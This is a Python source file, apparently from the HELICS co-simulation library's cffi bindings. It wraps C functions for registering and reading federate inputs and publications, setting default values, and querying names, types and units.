def helicsFederateRegisterInput(fed: HelicsFederate, name: str, type: HelicsDataType, units: str) -> HelicsInput:
"""
Register a named input.
The input becomes part of the federate and is destroyed when the federate is freed so there are no separate free
functions for subscriptions, inputs, and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an input.
- **`name`** - The identifier for the input; the global input name will be prepended with the federate name.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the input (optional).
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateRegisterInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateRegisterTypeInput(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsInput:
"""
Register an input with a defined type.
The input becomes part of the federate and is destroyed when the federate is freed so there are no separate free
functions for subscriptions, inputs, and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an input.
- **`name`** - The identifier for the input.
- **`type`** - A string describing the expected type of the input.
- **`units`** - A string listing the units of the input (optional).
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateRegisterTypeInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateRegisterGlobalInput(fed: HelicsFederate, name: str, type: HelicsDataType, units: str) -> HelicsInput:
"""
Register a global named input.
The input becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions, inputs, and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an input.
- **`name`** - The identifier for the input.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the input (optional).
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateRegisterGlobalInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateRegisterGlobalTypeInput(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsInput:
"""
Register a global named input with a defined type.
The input becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions, inputs, and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create an input.
- **`name`** - The identifier for the input.
- **`type`** - A string defining the type of the input.
- **`units`** - A string listing the units of the input (optional).
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateRegisterGlobalTypeInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateGetPublication(fed: HelicsFederate, name: str) -> HelicsPublication:
"""
Get a `helics.HelicsPublication` from a name.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to get the publication.
- **`name`** - The name of the publication.
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateGetPublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateGetPublicationByIndex(fed: HelicsFederate, index: int) -> HelicsPublication:
"""
Get a publication by its index, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`index`** - The index of the publication to get.
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateGetPublicationByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateGetInput(fed: HelicsFederate, name: str) -> HelicsInput:
"""
Get an input object from a name.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to get the publication.
- **`name`** - The name of the input.
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateGetInput")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateGetInputByIndex(fed: HelicsFederate, index: int) -> HelicsInput:
"""
Get an input by its index, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to use to get the input.
- **`index`** - The index of the input to get.
**Returns**: `helics.HelicsInput`.
"""
f = loadSym("helicsFederateGetInputByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateGetSubscription(fed: HelicsFederate, name: str) -> HelicsInput:
"""
Get an input object from a subscription target.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to get the publication.
- **`name`** - The name of the publication that a subscription is targeting.
**Returns**: `helics.HelicsInput`
"""
f = loadSym("helicsFederateGetSubscription")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateClearUpdates(fed: HelicsFederate):
"""
Clear all the update flags from a federate's inputs.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` for which to clear update flags.
"""
f = loadSym("helicsFederateClearUpdates")
f(fed.handle)
def helicsFederateRegisterFromPublicationJSON(fed: HelicsFederate, json: str):
"""
Register the publications via JSON publication string.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` to use to register the publications.
- **`json`** - The JSON publication string.
"""
f = loadSym("helicsFederateRegisterFromPublicationJSON")
err = helicsErrorInitialize()
f(fed.handle, cstring(json), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederatePublishJSON(fed: HelicsFederate, json: str):
"""
Publish data contained in a JSON file or string.
**Parameters**
- **`fed`** - The value `helics.HelicsFederate` through which to publish the data.
- **`json`** - The publication file name or literal JSON data string.
"""
f = loadSym("helicsFederatePublishJSON")
err = helicsErrorInitialize()
f(fed.handle, cstring(json), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
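# Illustrative sketch (not part of the library): registering publications from a JSON
# string and then publishing values for them in one call. The field names are
# hypothetical, and the assumed format is a JSON object mapping publication names to
# values; the argument may also be a file name.
def _example_publish_json(fed: HelicsFederate):
    helicsFederateRegisterFromPublicationJSON(fed, '{"pub1": 1.0, "pub2": "ready"}')
    helicsFederatePublishJSON(fed, '{"pub1": 2.5, "pub2": "running"}')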
def helicsPublicationIsValid(pub: HelicsPublication) -> bool:
"""
Publication functions.
Functions for publishing data of various kinds.
The data will automatically be translated to the type specified when the publication was registered, regardless of the function used to publish the data.
Check if a publication is valid.
**Parameters**
- **`pub`** - The publication to check.
**Returns**: `True` if the publication is a valid publication.
"""
f = loadSym("helicsPublicationIsValid")
result = f(pub.handle)
return result == 1
def helicsPublicationPublishRaw(pub: HelicsPublication, data: bytes):
"""
Publish raw data from a char * and length.
**Parameters**
- **`pub`** - The publication to publish for.
- **`data`** - A pointer to the raw data.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsPublicationPublishBytes` instead.")
helicsPublicationPublishBytes(pub, data)
def helicsPublicationPublishBytes(pub: HelicsPublication, data: bytes):
"""
Publish raw data from a char * and length.
**Parameters**
- **`pub`** - The publication to publish for.
- **`data`** - A pointer to the raw data.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsPublicationPublishRaw")
else:
f = loadSym("helicsPublicationPublishBytes")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(pub.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishString(pub: HelicsPublication, string: str):
"""
Publish a string.
**Parameters**
- **`pub`** - The publication to publish for.
- **`string`** - The string to publish.
"""
f = loadSym("helicsPublicationPublishString")
err = helicsErrorInitialize()
f(pub.handle, cstring(string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishInteger(pub: HelicsPublication, value: int):
"""
Publish an integer value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The numerical value to publish.
"""
f = loadSym("helicsPublicationPublishInteger")
err = helicsErrorInitialize()
f(pub.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishBoolean(pub: HelicsPublication, value: bool):
"""
Publish a Boolean Value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The boolean value to publish.
"""
f = loadSym("helicsPublicationPublishBoolean")
err = helicsErrorInitialize()
f(pub.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishDouble(pub: HelicsPublication, value: float):
"""
Publish a double floating point value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The numerical value to publish.
"""
f = loadSym("helicsPublicationPublishDouble")
err = helicsErrorInitialize()
f(pub.handle, cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishTime(pub: HelicsPublication, value: HelicsTime):
"""
Publish a time value.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The numerical value to publish.
"""
f = loadSym("helicsPublicationPublishTime")
err = helicsErrorInitialize()
f(pub.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishChar(pub: HelicsPublication, value: str):
"""
Publish a single character.
**Parameters**
- **`pub`** - The publication to publish for.
- **`value`** - The single character to publish.
"""
f = loadSym("helicsPublicationPublishChar")
err = helicsErrorInitialize()
f(pub.handle, cchar(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishComplex(pub: HelicsPublication, real: float, imag: float = 0):
"""
Publish a complex value (or pair of values).
**Parameters**
- **`pub`** - The publication to publish for.
- **`real`** - `float` number or `complex` number
- **`imag`** - `float` number
"""
c = complex(real, imag)
f = loadSym("helicsPublicationPublishComplex")
err = helicsErrorInitialize()
f(pub.handle, c.real, c.imag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishVector(pub: HelicsPublication, vectorInput: List[float]):
"""
Publish a vector of doubles.
**Parameters**
- **`pub`** - The publication to publish for.
- **`vectorInput`** - A list of double precision floating point values to publish.
"""
f = loadSym("helicsPublicationPublishVector")
err = helicsErrorInitialize()
vectorLength = len(vectorInput)
f(pub.handle, vectorInput, vectorLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationPublishNamedPoint(pub: HelicsPublication, string: str, value: float):
"""
Publish a named point.
**Parameters**
- **`pub`** - The publication to publish for.
- **`string`** - A string for the name to publish.
- **`value`** - A double for the value to publish.
"""
f = loadSym("helicsPublicationPublishNamedPoint")
err = helicsErrorInitialize()
f(pub.handle, cstring(string), cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
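# Illustrative sketch (not part of the library): the publish calls below all target the
# same publication; HELICS converts each pushed value to the type the publication was
# registered with. `pub` is assumed to be a previously registered publication.
def _example_publish_values(pub: HelicsPublication):
    helicsPublicationPublishDouble(pub, 3.14)
    helicsPublicationPublishInteger(pub, 42)
    helicsPublicationPublishString(pub, "on")
    helicsPublicationPublishComplex(pub, 1.0, -2.0)
    helicsPublicationPublishVector(pub, [0.0, 1.0, 2.0])
    helicsPublicationPublishNamedPoint(pub, "setpoint", 0.9)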
def helicsPublicationAddTarget(pub: HelicsPublication, target_name: str):
"""
Add a named input to the list of targets a publication publishes to.
**Parameters**
- **`pub`** - The publication to add the target for.
- **`target_name`** - The name of an input that the data should be sent to.
"""
f = loadSym("helicsPublicationAddTarget")
err = helicsErrorInitialize()
f(pub.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputIsValid(ipt: HelicsInput) -> bool:
"""
Check if an input is valid.
**Parameters**
- **`ipt`** - The input to check
**Returns**: `True` if the Input object represents a valid input.
"""
f = loadSym("helicsInputIsValid")
result = f(ipt.handle)
return result == 1
def helicsInputAddTarget(ipt: HelicsInput, target_name: str):
"""
Add a publication to the list of data that an input subscribes to.
**Parameters**
- **`ipt`** - The named input to modify.
- **`target_name`** - The name of a publication that an input should subscribe to.
"""
f = loadSym("helicsInputAddTarget")
err = helicsErrorInitialize()
f(ipt.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputGetRawValueSize(ipt: HelicsInput) -> int:
"""
Data can be returned in a number of formats, for instance if data is published as a double it can be returned as a string and vice versa, not all translations make that much sense but they do work.
Get the size of the raw value for subscription.
**Returns**: The size of the raw data/string in bytes.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsInputGetByteCount` instead.")
return helicsInputGetByteCount(ipt)
def helicsInputGetByteCount(ipt: HelicsInput) -> int:
"""
Data can be returned in a number of formats, for instance if data is published as a double it can be returned as a string and vice versa, not all translations make that much sense but they do work.
Get the size of the raw value for subscription.
**Returns**: The size of the raw data/string in bytes.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputGetRawValueSize")
else:
f = loadSym("helicsInputGetByteCount")
result = f(ipt.handle)
return result
def helicsInputGetRawValue(ipt: HelicsInput) -> bytes:
"""
Get the raw data for the latest value of a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: Raw string data.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsInputGetBytes` instead.")
return helicsInputGetBytes(ipt)
def helicsInputGetBytes(ipt: HelicsInput) -> bytes:
"""
Get the raw data for the latest value of a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: Raw string data.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputGetRawValue")
else:
f = loadSym("helicsInputGetBytes")
err = helicsErrorInitialize()
maxDataLen = helicsInputGetByteCount(ipt) + 1024
data = ffi.new("char[{maxDataLen}]".format(maxDataLen=maxDataLen))
actualSize = ffi.new("int[1]")
f(ipt.handle, data, maxDataLen, actualSize, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.unpack(data, length=actualSize[0])
def helicsInputGetStringSize(ipt: HelicsInput) -> int:
"""
Get the size of a value for subscription assuming return as a string.
**Returns**: The size of the string.
"""
f = loadSym("helicsInputGetStringSize")
result = f(ipt.handle)
return result
def helicsInputGetString(ipt: HelicsInput) -> str:
"""
Get a string value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The string value of the input.
"""
f = loadSym("helicsInputGetString")
err = helicsErrorInitialize()
maxStringLen = helicsInputGetStringSize(ipt) + 1024
outputString = ffi.new("char[{maxStringLen}]".format(maxStringLen=maxStringLen))
actualLength = ffi.new("int[1]")
f(ipt.handle, outputString, maxStringLen, actualLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(outputString, maxlen=actualLength[0]).decode()
def helicsInputGetInteger(ipt: HelicsInput) -> int:
"""
Get an integer value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: An int64_t value with the current value of the input.
"""
f = loadSym("helicsInputGetInteger")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsInputGetBoolean(ipt: HelicsInput) -> bool:
"""
Get a boolean value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The current value of the input as a boolean.
"""
f = loadSym("helicsInputGetBoolean")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsInputGetDouble(ipt: HelicsInput) -> float:
"""
Get a double value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The double value of the input.
"""
f = loadSym("helicsInputGetDouble")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsInputGetTime(ipt: HelicsInput) -> HelicsTime:
"""
Get a time value from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The resulting time value.
"""
f = loadSym("helicsInputGetTime")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsInputGetChar(ipt: HelicsInput) -> str:
"""
Get a single character value from an input.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: The resulting character value.
"""
f = loadSym("helicsInputGetChar")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
# cffi returns a one character bytes object for a C `char`; decode it to a Python str
return result.decode()
def helicsInputGetComplexObject(ipt: HelicsInput) -> Tuple[float, float]:
"""
Get a complex object from an input object.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: `complex`.
"""
f = loadSym("helicsInputGetComplexObject")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
warnings.warn("This function will return a complex number in the next major release")
return (result.real, result.imag)
def helicsInputGetComplex(ipt: HelicsInput) -> Tuple[float, float]:
"""
Get a pair of doubles forming a complex number from a subscription.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: A pair of floating point values representing the real and imaginary parts.
"""
f = loadSym("helicsInputGetComplex")
err = helicsErrorInitialize()
real = ffi.new("double *")
imag = ffi.new("double *")
f(ipt.handle, real, imag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
warnings.warn("This function will return a complex number in the next major release")
return (real[0], imag[0])
def helicsInputGetVectorSize(ipt: HelicsInput) -> int:
"""
Get the size of a value for subscription assuming return as an array of doubles.
**Returns**: The number of doubles in a returned vector.
"""
f = loadSym("helicsInputGetVectorSize")
result = f(ipt.handle)
return result
def helicsInputGetVector(ipt: HelicsInput) -> List[float]:
"""
Get a vector from a subscription.
**Parameters**
- **`ipt`** - The input to get the result for.
**Returns**: a list of floating point values
"""
f = loadSym("helicsInputGetVector")
err = helicsErrorInitialize()
maxlen = helicsInputGetVectorSize(ipt) + 1024
data = ffi.new("double[{maxlen}]".format(maxlen=maxlen))
actualSize = ffi.new("int[1]")
f(ipt.handle, data, maxlen, actualSize, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return [x for x in data][0 : actualSize[0]]
def helicsInputGetNamedPoint(ipt: HelicsInput) -> Tuple[str, float]:
"""
Get a named point from a subscription.
**Parameters**
- **`ipt`** - The input to get the result for.
**Returns**: A tuple of a string and a double value for the named point.
"""
f = loadSym("helicsInputGetNamedPoint")
err = helicsErrorInitialize()
maxStringLen = helicsInputGetStringSize(ipt) + 1024
outputString = ffi.new("char[{maxStringLen}]".format(maxStringLen=maxStringLen))
actualLength = ffi.new("int[1]")
value = ffi.new("double[1]")
f(ipt.handle, outputString, maxStringLen, actualLength, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(outputString, maxlen=actualLength[0]).decode(), value[0]
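# Illustrative sketch (not part of the library): reading the latest value of an input in
# several representations. HELICS translates the stored value to the requested type, so
# the same input can be read as a string, a double, or a vector.
def _example_read_input(ipt: HelicsInput):
    as_string = helicsInputGetString(ipt)
    as_double = helicsInputGetDouble(ipt)
    as_vector = helicsInputGetVector(ipt)
    return as_string, as_double, as_vector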
def helicsInputSetDefaultRaw(ipt: HelicsInput, data: bytes):
"""
Default Value functions.
These functions set the default value for a subscription. That is the value returned if nothing was published from elsewhere.
Set the default as a raw data array.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`data`** - A pointer to the raw data to use for the default.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsInputSetDefaultBytes` instead.")
helicsInputSetDefaultBytes(ipt, data)
def helicsInputSetDefaultBytes(ipt: HelicsInput, data: bytes):
"""
Default Value functions.
These functions set the default value for a subscription. That is the value returned if nothing was published from elsewhere.
Set the default as a raw data array.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`data`** - A pointer to the raw data to use for the default.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputSetDefaultRaw")
else:
f = loadSym("helicsInputSetDefaultBytes")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(ipt.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultString(ipt: HelicsInput, string: str):
"""
Set the default as a string.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`string`** - A pointer to the default string.
"""
f = loadSym("helicsInputSetDefaultString")
err = helicsErrorInitialize()
f(ipt.handle, cstring(string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultInteger(ipt: HelicsInput, value: int):
"""
Set the default as an integer.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default integer.
"""
f = loadSym("helicsInputSetDefaultInteger")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultBoolean(ipt: HelicsInput, value: bool):
"""
Set the default as a boolean.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default boolean value.
"""
f = loadSym("helicsInputSetDefaultBoolean")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultTime(ipt: HelicsInput, value: HelicsTime):
"""
Set the default as a time.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default time value.
"""
f = loadSym("helicsInputSetDefaultTime")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultChar(ipt: HelicsInput, value: str):
"""
Set the default as a char.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default char value.
"""
f = loadSym("helicsInputSetDefaultChar")
err = helicsErrorInitialize()
f(ipt.handle, cchar(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultDouble(ipt: HelicsInput, value: float):
"""
Set the default as a double.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default double value.
"""
f = loadSym("helicsInputSetDefaultDouble")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultComplex(ipt: HelicsInput, real: float, imag: float = 0):
"""
Set the default as a complex number.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`real`** - The default real value.
- **`imag`** - The default imaginary value.
"""
c = complex(real, imag)
f = loadSym("helicsInputSetDefaultComplex")
err = helicsErrorInitialize()
f(ipt.handle, c.real, c.imag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultVector(ipt: HelicsInput, vectorInput: List[float]):
"""
Set the default as a vector of doubles.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`vectorInput`** - A pointer to an array of double data.
"""
f = loadSym("helicsInputSetDefaultVector")
err = helicsErrorInitialize()
vectorLength = len(vectorInput)
f(ipt.handle, vectorInput, vectorLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultNamedPoint(ipt: HelicsInput, string: str, value: float):
"""
Set the default as a `NamedPoint`.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`string`** - A pointer to a string representing the name.
- **`value`** - A double value for the value of the named point.
"""
f = loadSym("helicsInputSetDefaultNamedPoint")
err = helicsErrorInitialize()
f(ipt.handle, cstring(string), cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
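# Illustrative sketch (not part of the wrapper API): give a subscription
# sensible defaults so that reads are well defined before anything has been
# published. The concrete default values are examples only.
def _sketch_set_defaults(sub: HelicsInput):
    helicsInputSetDefaultDouble(sub, 0.0)
    helicsInputSetDefaultString(sub, "unset")
    helicsInputSetDefaultVector(sub, [0.0, 0.0, 0.0])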
def helicsInputGetType(ipt: HelicsInput) -> str:
"""
Get the type of an input.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the type information.
"""
f = loadSym("helicsInputGetType")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputGetPublicationType(ipt: HelicsInput) -> str:
"""
Get the type the publisher to an input is sending.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the type information.
"""
f = loadSym("helicsInputGetPublicationType")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsPublicationGetType(pub: HelicsPublication) -> str:
"""
Get the type of a publication.
**Parameters**
- **`pub`** - The publication to query
**Returns**: A string with the publication type information.
"""
f = loadSym("helicsPublicationGetType")
result = f(pub.handle)
return ffi.string(result).decode()
def helicsInputGetKey(ipt: HelicsInput) -> str:
"""
Get the name of an input.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the name information.
**DEPRECATED**
"""
warnings.warn("This is deprecated. Use `helicsInputGetName` instead.")
return helicsInputGetName(ipt)
def helicsInputGetName(ipt: HelicsInput) -> str:
"""
Get the name of an input.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the name information.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputGetKey")
else:
f = loadSym("helicsInputGetName")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsSubscriptionGetKey(ipt: HelicsInput) -> str:
"""
Get the name of a subscription.
**Returns**: A string with the subscription name.
**DEPRECATED**
"""
warnings.warn("This is deprecated. Use `helicsSubscriptionGetTarget` instead.")
return helicsSubscriptionGetTarget(ipt)
def helicsSubscriptionGetTarget(ipt: HelicsInput) -> str:
"""
Get the target of a subscription.
**Returns**: A string with the subscription target.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsSubscriptionGetKey")
else:
f = loadSym("helicsSubscriptionGetTarget")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsPublicationGetKey(pub: HelicsPublication) -> str:
"""
Get the name of a publication.
This will be the global name used to identify the publication to the federation.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the name of the publication.
**DEPRECATED**
"""
warnings.warn("This is deprecated. Use `helicsPublicationGetName` instead.")
return helicsPublicationGetName(pub)
def helicsPublicationGetName(pub: HelicsPublication) -> str:
"""
Get the name of a publication.
This will be the global name used to identify the publication to the federation.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the name of the publication.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsPublicationGetKey")
else:
f = loadSym("helicsPublicationGetName")
result = f(pub.handle)
return ffi.string(result).decode()
def helicsInputGetUnits(ipt: HelicsInput) -> str:
"""
Get the units of an input.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsInputGetUnits")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputGetInjectionUnits(ipt: HelicsInput) -> str:
"""
Get the units of the publication that an input is linked to.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsInputGetInjectionUnits")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputGetExtractionUnits(ipt: HelicsInput) -> str:
"""
Get the units of an input.
The same as `helics.helicsInputGetUnits`.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsInputGetExtractionUnits")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsPublicationGetUnits(pub: HelicsPublication) -> str:
"""
Get the units of a publication.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsPublicationGetUnits")
result = f(pub.handle)
return ffi.string(result).decode()
